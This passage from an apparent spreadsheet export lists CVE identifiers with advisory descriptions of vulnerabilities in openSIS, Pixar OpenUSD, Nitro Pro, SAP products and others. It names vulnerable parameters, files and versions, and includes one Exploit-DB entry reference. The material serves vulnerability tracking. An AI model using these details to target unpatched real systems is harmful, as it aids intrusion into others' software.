    <t>An exploitable SQL injection vulnerability exists in the DownloadWindow.php functionality of OS4Ed openSIS 7.3. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6137</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the password reset functionality of OS4Ed openSIS 7.3. The password_stf_email parameter in the password reset page /opensis/ResetUserInfo.php is vulnerable to SQL injection. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6138</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the password reset functionality of OS4Ed openSIS 7.3. The uname parameter in the password reset page /opensis/ResetUserInfo.php is vulnerable to SQL injection An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6139</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the password reset functionality of OS4Ed openSIS 7.3. The username_stf_email parameter in the password reset page /opensis/ResetUserInfo.php is vulnerable to SQL injection. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6140</t>
  </si>
  <si>
    <t>CVE-2020-6141</t>
  </si>
  <si>
    <t>An exploitable SQL injection vulnerability exists in the login functionality of OS4Ed openSIS 7.3. A specially crafted HTTP request can lead to SQL injection. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6142</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the Modules.php functionality of OS4Ed openSIS 7.3. A specially crafted HTTP request can cause local file inclusion. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6143</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the install functionality of OS4Ed openSIS 7.4. The password variable which is set at line 122 in install/Step5.php allows for injection of PHP code into the Data.php file that it writes. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6144</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the install functionality of OS4Ed openSIS 7.4. The username variable which is set at line 121 in install/Step5.php allows for injection of PHP code into the Data.php file that it writes. An attacker can send an HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6145</t>
  </si>
  <si>
    <t>An SQL injection vulnerability exists in the frappe.desk.reportview.get functionality of ERPNext 11.1.38. A specially crafted HTTP request can cause an SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6146</t>
  </si>
  <si>
    <t>An exploitable code execution vulnerability exists in the rendering functionality of Nitro Pro 13.13.2.242 and 13.16.2.300. When drawing the contents of a page and selecting the stroke color from an 'ICCBased' colorspace, the application will read a length from the file and use it as a loop sentinel when writing data into the member of an object. Due to the object member being a buffer of a static size allocated on the heap, this can result in a heap-based buffer overflow. A specially crafted document must be loaded by a victim in order to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6147</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. This instance exists in the USDC file format FIELDS section decompression heap overflow.</t>
  </si>
  <si>
    <t>CVE-2020-6148</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. An instance exists in USDC file format FIELDSETS section decompression heap overflow.</t>
  </si>
  <si>
    <t>CVE-2020-6149</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file in an instance in USDC file format PATHS section.</t>
  </si>
  <si>
    <t>CVE-2020-6150</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software USDC file format SPECS section decompression heap overflow.</t>
  </si>
  <si>
    <t>CVE-2020-6151</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists in the TIFF handle_COMPRESSION_PACKBITS functionality of Accusoft ImageGear 19.7. A specially crafted malformed file can cause a memory corruption. An attacker can provide a malicious file to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6152</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the DICOM parse_dicom_meta_info functionality of Accusoft ImageGear 19.7. A specially crafted malformed file can cause an out-of-bounds write. An attacker can trigger this vulnerability by providing a victim with a malicious DICOM file.</t>
  </si>
  <si>
    <t>CVE-2020-6155</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in the Pixar OpenUSD 20.05 while parsing compressed value rep arrays in binary USD files. A specially crafted malformed file can trigger a heap overflow, which can result in remote code execution. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-6156</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file in an instance USDC file format path element token index.</t>
  </si>
  <si>
    <t>CVE-2020-6157</t>
  </si>
  <si>
    <t>Opera Touch for iOS before version 2.4.5 is vulnerable to an address bar spoofing attack. The vulnerability allows a malicious page to trick the browser into showing an address of a different page. This may allow the malicious page to impersonate another page and trick a user into providing sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-6159</t>
  </si>
  <si>
    <t>URLs using “javascript:” have the protocol removed when pasted into the address bar to protect users from cross-site scripting (XSS) attacks, but in certain circumstances this removal was not performed. This could allow users to be socially engineered to run an XSS attack against themselves. This vulnerability affects Opera for Android versions below 61.0.3076.56532.</t>
  </si>
  <si>
    <t>CVE-2020-6162</t>
  </si>
  <si>
    <t>An issue was discovered in Bftpd 5.3. Under certain circumstances, an out-of-bounds read is triggered due to an uninitialized value. The daemon crashes at startup in the hidegroups_init function in dirlist.c.</t>
  </si>
  <si>
    <t>CVE-2020-6163</t>
  </si>
  <si>
    <t>The WikibaseMediaInfo extension 1.35 for MediaWiki allows XSS because of improper template syntax within the PropertySuggestionsWidget template (in the templates/search/PropertySuggestionsWidget.mustache+dom file).</t>
  </si>
  <si>
    <t>CVE-2020-6164</t>
  </si>
  <si>
    <t>In SilverStripe through 4.5.0, a specific URL path configured by default through the silverstripe/framework module can be used to disclose the fact that a domain is hosting a Silverstripe application. There is no disclosure of the specific version. The functionality on this URL path is limited to execution in a CLI context, and is not known to present a vulnerability through web-based access. As a side-effect, this preconfigured path also blocks the creation of other resources on this path (e.g. a page).</t>
  </si>
  <si>
    <t>CVE-2020-6165</t>
  </si>
  <si>
    <t>SilverStripe 4.5.0 allows attackers to read certain records that should not have been placed into a result set. This affects silverstripe/recipe-cms. The automatic permission-checking mechanism in the silverstripe/graphql module does not provide complete protection against lists that are limited (e.g., through pagination), resulting in records that should have failed a permission check being added to the final result set. GraphQL endpoints are configured by default (e.g., for assets), but the admin/graphql endpoint is access protected by default. This limits the vulnerability to all authenticated users, including those with limited permissions (e.g., where viewing records exposed through admin/graphql requires administrator permissions). However, if custom GraphQL endpoints have been configured for a specific implementation (usually under /graphql), this vulnerability could also be exploited through unauthenticated requests. This vulnerability only applies to reading records; it does not allow unauthorised changing of records.</t>
  </si>
  <si>
    <t>CVE-2020-6166</t>
  </si>
  <si>
    <t>A flaw in the WordPress plugin, Minimal Coming Soon &amp; Maintenance Mode through 2.15, allows authenticated users with basic access to export settings and change maintenance-mode themes.</t>
  </si>
  <si>
    <t>CVE-2020-6167</t>
  </si>
  <si>
    <t>A flaw in the WordPress plugin, Minimal Coming Soon &amp; Maintenance Mode through 2.10, allows a CSRF attack to enable maintenance mode, inject XSS, modify several important settings, or include remote files as a logo.</t>
  </si>
  <si>
    <t>CVE-2020-6168</t>
  </si>
  <si>
    <t>A flaw in the WordPress plugin, Minimal Coming Soon &amp; Maintenance Mode through 2.10, allows authenticated users with basic access to enable and disable maintenance-mode settings (impacting the availability and confidentiality of a vulnerable site, along with the integrity of the setting).</t>
  </si>
  <si>
    <t>CVE-2020-6170</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability on Genexis Platinum-4410 v2.1 P4410-V2 1.28 devices allows attackers to obtain cleartext credentials from the HTML source code of the cgi-bin/index2.asp URI.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/47961.txt</t>
  </si>
  <si>
    <t>Genexis Platinum-4410 2.1 - Authentication Bypass</t>
  </si>
  <si>
    <t>2020-01-24</t>
  </si>
  <si>
    <t>CVE-2020-6171</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6173</t>
  </si>
  <si>
    <t>TUF (aka The Update Framework) 0.7.2 through 0.12.1 allows Uncontrolled Resource Consumption.</t>
  </si>
  <si>
    <t>CVE-2020-6174</t>
  </si>
  <si>
    <t>TUF (aka The Update Framework) through 0.12.1 has Improper Verification of a Cryptographic Signature.</t>
  </si>
  <si>
    <t>CVE-2020-6175</t>
  </si>
  <si>
    <t>Citrix SD-WAN 10.2.x before 10.2.6 and 11.0.x before 11.0.3 has Missing SSL Certificate Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6177</t>
  </si>
  <si>
    <t>SAP Mobile Platform, version 3.0, does not sufficiently validate an XML document accepted from an untrusted source which could lead to partial denial of service. Since SAP Mobile Platform does not allow External-Entity resolving, there is no issue of leaking content of files on the server.</t>
  </si>
  <si>
    <t>CVE-2020-6178</t>
  </si>
  <si>
    <t>SAP Enable Now, before version 1911, sends the Session ID cookie value in URL. This might be stolen from the browser history or log files, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6181</t>
  </si>
  <si>
    <t>Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6183</t>
  </si>
  <si>
    <t>SAP Host Agent, version 7.21, allows an unprivileged user to read the shared memory or write to the shared memory by sending request to the main SAPOSCOL process and receive responses that may contain data read with user root privileges e.g. size of any directory, system hardware and OS details, leading to Missing Authorization Check vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6184</t>
  </si>
  <si>
    <t>Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6185</t>
  </si>
  <si>
    <t>Under certain conditions ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), allows an authenticated attacker to store a malicious payload which results in Stored Cross Site Scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6186</t>
  </si>
  <si>
    <t>SAP Host Agent, version 7.21, allows an attacker to cause a slowdown in processing of username/password-based authentication requests of the SAP Host Agent, leading to Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-6187</t>
  </si>
  <si>
    <t>SAP NetWeaver (Guided Procedures), versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently validate an XML document input from a compromised admin, leading to Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-6188</t>
  </si>
  <si>
    <t>VAT Pro-Rata reports in SAP ERP (SAP_APPL versions 600, 602, 603, 604, 605, 606, 616 and SAP_FIN versions 617, 618, 700, 720, 730) and SAP S/4 HANA (versions 100, 101, 102, 103, 104) do not perform necessary authorization checks for an authenticated user leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6189</t>
  </si>
  <si>
    <t>Certain settings page(s) in SAP Business Objects Business Intelligence Platform (CMC), version 4.2, generates error messages that can give enterprise private-network related information which would otherwise be restricted leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6190</t>
  </si>
  <si>
    <t>Certain vulnerable endpoints in SAP NetWeaver AS Java (Heap Dump Application), versions 7.30, 7.31, 7.40, 7.50, provide valuable information about the system like hostname, server node and installation path that could be misused by an attacker leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6191</t>
  </si>
  <si>
    <t>SAP Landscape Management, version 3.0, allows an attacker with admin privileges to execute malicious executables with root privileges in SAP Host Agent via SAP Landscape Management due to Missing Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6192</t>
  </si>
  <si>
    <t>SAP Landscape Management, version 3.0, allows an attacker with admin privileges to execute malicious commands with root privileges in SAP Host Agent via SAP Landscape Management.</t>
  </si>
  <si>
    <t>CVE-2020-6193</t>
  </si>
  <si>
    <t>SAP NetWeaver (Knowledge Management ICE Service), versions 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to execute malicious scripts leading to Reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6195</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (CMC), version 4.1, 4.2, shows cleartext password in the response, leading to Information Disclosure. It involves social engineering in order to gain access to system and If password is known, it would give administrative rights to the attacker to read/modify delete the data and rights within the system.</t>
  </si>
  <si>
    <t>CVE-2020-6196</t>
  </si>
  <si>
    <t>SAP BusinessObjects Mobile (MobileBIService), version 4.2, allows an attacker to generate multiple requests, using which he can block all the threads resulting in a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-6197</t>
  </si>
  <si>
    <t>SAP Enable Now, before version 1908, does not invalidate session tokens in a timely manner. The Insufficient Session Expiration may allow attackers with local access, for instance, to still download the portables.</t>
  </si>
  <si>
    <t>CVE-2020-6198</t>
  </si>
  <si>
    <t>SAP Solution Manager (Diagnostics Agent), version 720, allows unencrypted connections from unauthenticated sources. This allows an attacker to control all remote functions on the Agent due to Missing Authentication Check.</t>
  </si>
  <si>
    <t>CVE-2020-6199</t>
  </si>
  <si>
    <t>The view FIMENAV_COMPCERT in SAP ERP (MENA Certificate Management), EAPPGLO version 607, SAP_FIN versions- 618, 730 and SAP S/4HANA (MENA Certificate Management), S4CORE versions- 100, 101, 102, 103, 104; does not have any authorization check to it due to which an attacker without an authorization group can maintain any company certificate, leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6200</t>
  </si>
  <si>
    <t>The SAP Commerce (SmartEdit Extension), versions- 6.6, 6.7, 1808, 1811, is vulnerable to client-side angularjs template injection, a variant of Cross-Site-Scripting (XSS) that exploits the templating facilities of the angular framework.</t>
  </si>
  <si>
    <t>CVE-2020-6201</t>
  </si>
  <si>
    <t>The SAP Commerce (Testweb Extension), versions- 6.6, 6.7, 1808, 1811, 1905, does not sufficiently encode user-controlled inputs, due to which certain GET URL parameters are reflected in the HTTP responses without escaping/sanitization, leading to Reflected Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-6202</t>
  </si>
  <si>
    <t>SAP NetWeaver Application Server Java (User Management Engine), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; does not sufficiently validate the LDAP data source configuration XML document accepted from an untrusted source, leading to Missing XML Validation.</t>
  </si>
  <si>
    <t>CVE-2020-6203</t>
  </si>
  <si>
    <t>SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing 'traverse to parent directory' are passed through to the file APIs, leading to Path Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-6204</t>
  </si>
  <si>
    <t>The selection query in SAP Treasury and Risk Management (Transaction Management) (EA-FINSERV?versions 600, 603, 604, 605, 606, 616, 617, 618, 800 and S4CORE versions 101, 102, 103, 104) returns more records than it should be when selecting and displaying the contract number, leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6205</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP Business Server Pages (Smart Forms), SAP_BASIS versions- 7.00, 7.01, 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51, 7.52, 7.53, 7.54; does not sufficiently encode user controlled inputs, allowing an unauthenticated attacker to non-permanently deface or modify displayed content and/or steal authentication information of the user and/or impersonate the user and access all information with the same rights as the target user, leading to Reflected Cross Site Scripting Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6206</t>
  </si>
  <si>
    <t>SAP Cloud Platform Integration for Data Services, version 1.0, allows user inputs to be reflected as error or warning massages. This could mislead the victim to follow malicious instructions inserted by external attackers, leading to Cross Site Request Forgery.</t>
  </si>
  <si>
    <t>CVE-2020-6207</t>
  </si>
  <si>
    <t>SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.</t>
  </si>
  <si>
    <t>CVE-2020-6208</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Crystal Reports), versions- 4.1, 4.2, allows an attacker with basic authorization to inject code that can be executed by the application and thus allowing the attacker to control the behaviour of the application, leading to Remote Code Execution. Although the mode of attack is only Local, multiple applications can be impacted as a result of the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6209</t>
  </si>
  <si>
    <t>SAP Disclosure Management, version 10.1, does not perform necessary authorization checks for an authenticated user, allowing access to administration accounts by a user with no roles, leading to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6210</t>
  </si>
  <si>
    <t>SAP Fiori Launchpad, versions- 753, 754, does not sufficiently encode user-controlled inputs, and hence allowing the attacker to inject the meta tag into the launchpad html using the vulnerable parameter, leading to reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6211</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (AdminTools), versions 4.1, 4.2, allows an attacker to redirect users to a malicious site due to insufficient URL validation and steal credentials of the victim, leading to URL Redirection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6212</t>
  </si>
  <si>
    <t>Egypt localized withholding tax reports Clearing of Liabilities and Remittance Statement and Summary in SAP ERP (versions 618, 730, EAPPLGLO 607) and S/4 HANA (versions 100, 101, 102, 103, 104) do not perform necessary authorization checks for an authenticated user, allowing reading or modification of some tax reports, due to Missing Authorization Check.</t>
  </si>
  <si>
    <t>CVE-2020-6213</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP Business Server Pages Test Application SBSPEXT_PHTMLB, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, is vulnerable to reflected Cross-Site Scripting (XSS) via different URL parameters as it does not sufficiently encode user controlled inputs.</t>
  </si>
  <si>
    <t>CVE-2020-6214</t>
  </si>
  <si>
    <t>SAP S/4HANA (Financial Products Subledger), version 100, uses an incorrect authorization object in some reports. Although the affected reports are protected with other authorization objects, exploitation of the vulnerability would allow an authenticated attacker to view, change, or delete data, thereby preventing the proper segregation of duties in the system.</t>
  </si>
  <si>
    <t>CVE-2020-6215</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP Business Server Pages Test Application IT00, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, allows an attacker to redirect users to a malicious site due to insufficient URL validation and steal credentials of the victim, leading to URL Redirection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6216</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (BI Launchpad), version 4.2, does not sufficiently encode user-controlled inputs, resulting in reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6217</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP Business Server Pages Test Application IT00, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, does not sufficiently encode user-controlled inputs, resulting in reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6218</t>
  </si>
  <si>
    <t>Admin tools and Query Builder in SAP Business Objects Business Intelligence Platform, versions 4.1, 4.2, allows an attacker to access information that should otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6219</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (CrystalReports WebForm Viewer), versions 4.1, 4.2, and Crystal Reports for VS version 2010, allows an attacker with basic authorization to perform deserialization attack in the application, leading to service interruptions and denial of service and unauthorized execution of arbitrary commands, leading to Deserialization of Untrusted Data.</t>
  </si>
  <si>
    <t>CVE-2020-6220</t>
  </si>
  <si>
    <t>BI Launchpad and CMC in SAP Business Objects Business Intelligence Platform, versions 4.1, 4.2, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. Exploit is possible only when the bttoken in victim’s session is active.</t>
  </si>
  <si>
    <t>CVE-2020-6221</t>
  </si>
  <si>
    <t>Web Intelligence HTML interface in SAP Business Objects Business Intelligence Platform, versions 4.1, 4.2, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6222</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Web Intelligence HTML interface), versions 4.1, 4.2, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6223</t>
  </si>
  <si>
    <t>The open document of SAP Business Objects Business Intelligence Platform, versions 4.1, 4.2, allows an attacker to modify certain error pages to include malicious content. This can misdirect a user who is tricked into accessing these error pages rendered by the application, leading to Content Spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-6224</t>
  </si>
  <si>
    <t>SAP NetWeaver AS Java (HTTP Service), versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker with administrator privileges to access user sensitive data such as passwords in trace files, when the user logs in and sends request with login credentials, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-6225</t>
  </si>
  <si>
    <t>SAP NetWeaver (Knowledge Management), versions (KMC-CM - 7.00, 7.01, 7.02, 7.30, 7.31, 7.40, 7.50 and KMC-WPC 7.30, 7.31, 7.40, 7.50), does not sufficiently validate path information provided by users, thus characters representing traverse to parent directory are passed through to the file APIs, allowing the attacker to overwrite, delete, or corrupt arbitrary files on the remote server, leading to Path Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-6226</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Web Intelligence HTML interface), version 4.2, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6227</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (CMS / Auditing issues), version 4.2, allows attacker to send specially crafted GIOP packets to several services due to Improper Input Validation, allowing to forge additional entries in GLF log files.</t>
  </si>
  <si>
    <t>CVE-2020-6228</t>
  </si>
  <si>
    <t>SAP Business Client, versions 6.5, 7.0, does not perform necessary integrity checks which could be exploited by an attacker under certain conditions to modify the installer.</t>
  </si>
  <si>
    <t>CVE-2020-6229</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP (Business Server Pages application CRM_BSP_FRAME), versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, does not sufficiently encode user controlled inputs, resulting in reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6230</t>
  </si>
  <si>
    <t>SAP OrientDB, version 3.0, allows an authenticated attacker with script execute/write permissions to inject code that can be executed by the application and lead to Code Injection. An attacker could thereby control the behavior of the application.</t>
  </si>
  <si>
    <t>CVE-2020-6231</t>
  </si>
  <si>
    <t>CVE-2020-6232</t>
  </si>
  <si>
    <t>SAP Commerce, versions 1811, 1905, does not perform necessary authorization checks for an anonymous user, due to Missing Authorization Check. This affects confidentiality of secure media.</t>
  </si>
  <si>
    <t>CVE-2020-6233</t>
  </si>
  <si>
    <t>SAP S/4 HANA (Financial Products Subledger and Banking Services), versions - FSAPPL 400, 450, 500 and S4FPSL 100, allows an authenticated user to run an analysis report due to Missing Authorization Check, resulting in slowing the system.</t>
  </si>
  <si>
    <t>CVE-2020-6234</t>
  </si>
  <si>
    <t>SAP Host Agent, version 7.21, allows an attacker with admin privileges to use the operation framework to gain root privileges over the underlying operating system, leading to Privilege Escalation.</t>
  </si>
  <si>
    <t>CVE-2020-6235</t>
  </si>
  <si>
    <t>SAP Solution Manager (Diagnostics Agent), version 7.2, does not perform the authentication check for the functionalities of the Collector Simulator, leading to Missing Authentication.</t>
  </si>
  <si>
    <t>CVE-2020-6236</t>
  </si>
  <si>
    <t>SAP Landscape Management, version 3.0, and SAP Adaptive Extensions, version 1.0, allows an attacker with admin_group privileges to change ownership and permissions (including S-user ID bit s-bit) of arbitrary files remotely. This results in the possibility to execute these files as root user from a non-root context, leading to Privilege Escalation.</t>
  </si>
  <si>
    <t>CVE-2020-6237</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Business Objects Business Intelligence Platform, version 4.1, 4.2, dswsbobje web application allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6238</t>
  </si>
  <si>
    <t>SAP Commerce, versions - 6.6, 6.7, 1808, 1811, 1905, does not process XML input securely in the Rest API from Servlet xyformsweb, leading to Missing XML Validation. This affects confidentiality and availability (partially) of SAP Commerce.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-6239</t>
  </si>
  <si>
    <t>Under certain conditions SAP Business One (Backup service), versions 9.3, 10.0, allows an attacker with admin permissions to view SYSTEM user password in clear text, leading to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-6240</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP (Web Dynpro ABAP), versions (SAP_UI 750, 752, 753, 754 and SAP_BASIS 700, 710, 730, 731, 804) allows an unauthenticated attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service leading to Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-6241</t>
  </si>
  <si>
    <t>SAP Adaptive Server Enterprise, version 16.0, allows an authenticated user to execute crafted database queries to elevate privileges of users in the system, leading to SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6242</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform (Live Data Connect), versions 1.0, 2.0, 2.1, 2.2, 2.3, allows an attacker to logon on the Central Management Console without password in case of the BIPRWS application server was not protected with some specific certificate, leading to Missing Authentication Check.</t>
  </si>
  <si>
    <t>CVE-2020-6243</t>
  </si>
  <si>
    <t>Under certain conditions, SAP Adaptive Server Enterprise (XP Server on Windows Platform), versions 15.7, 16.0, does not perform the necessary checks for an authenticated user while executing the extended stored procedure, allowing an attacker to read, modify, delete restricted data on connected servers, leading to Code Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6244</t>
  </si>
  <si>
    <t>SAP Business Client, version 7.0, allows an attacker after a successful social engineering attack to inject malicious code as a DLL file in untrusted directories that can be executed by the application, due to uncontrolled search path element. An attacker could thereby control the behavior of the application.</t>
  </si>
  <si>
    <t>CVE-2020-6245</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker with access to local instance, to inject file or code that can be executed by the application due to Improper Control of Resource Identifiers.</t>
  </si>
  <si>
    <t>CVE-2020-6246</t>
  </si>
  <si>
    <t>SAP NetWeaver AS ABAP Business Server Pages Test Application SBSPEXT_TABLE, versions 700, 701, 702, 730, 731, 740, 750, 751, 752, 753, 754, does not sufficiently encode user-controlled inputs, resulting in reflected Cross-Site Scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6247</t>
  </si>
  <si>
    <t>SAP Business Objects Business Intelligence Platform, version 4.2, allows an unauthenticated attacker to prevent legitimate users from accessing a service. Using a specially crafted request, the attacker can crash or flood the Central Management Server, thereby impacting system availability.</t>
  </si>
  <si>
    <t>CVE-2020-6248</t>
  </si>
  <si>
    <t>SAP Adaptive Server Enterprise (Backup Server), version 16.0, does not perform the necessary validation checks for an authenticated user while executing DUMP or LOAD command allowing arbitrary code execution or Code Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6249</t>
  </si>
  <si>
    <t>The use of an admin backend report within SAP Master Data Governance, versions - S4CORE 101, S4FND 102, 103, 104, SAP_BS_FND 748; allows an attacker to execute crafted database queries, exposing the backend database, leading to SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6250</t>
  </si>
  <si>
    <t>SAP Adaptive Server Enterprise, version 16.0, allows an authenticated attacker to exploit certain misconfigured endpoints exposed over the adjacent network, to read system administrator password leading to Information Disclosure. This could help the attacker to read/write any data and even stop the server like an administrator.</t>
  </si>
  <si>
    <t>CVE-2020-6251</t>
  </si>
  <si>
    <t>Under certain conditions or error scenarios SAP Business Objects Business Intelligence Platform, version 4.2, allows an attacker to access information which would otherwise be restricted.</t>
  </si>
  <si>
    <t>CVE-2020-6252</t>
  </si>
  <si>
    <t>Under certain conditions SAP Adaptive Server Enterprise (Cockpit), version 16.0, allows an attacker with access to local network, to get sensitive and confidential information, leading to Information Disclosure. It can be used to get user account credentials, tamper with system data and impact system availability.</t>
  </si>
  <si>
    <t>CVE-2020-6253</t>
  </si>
  <si>
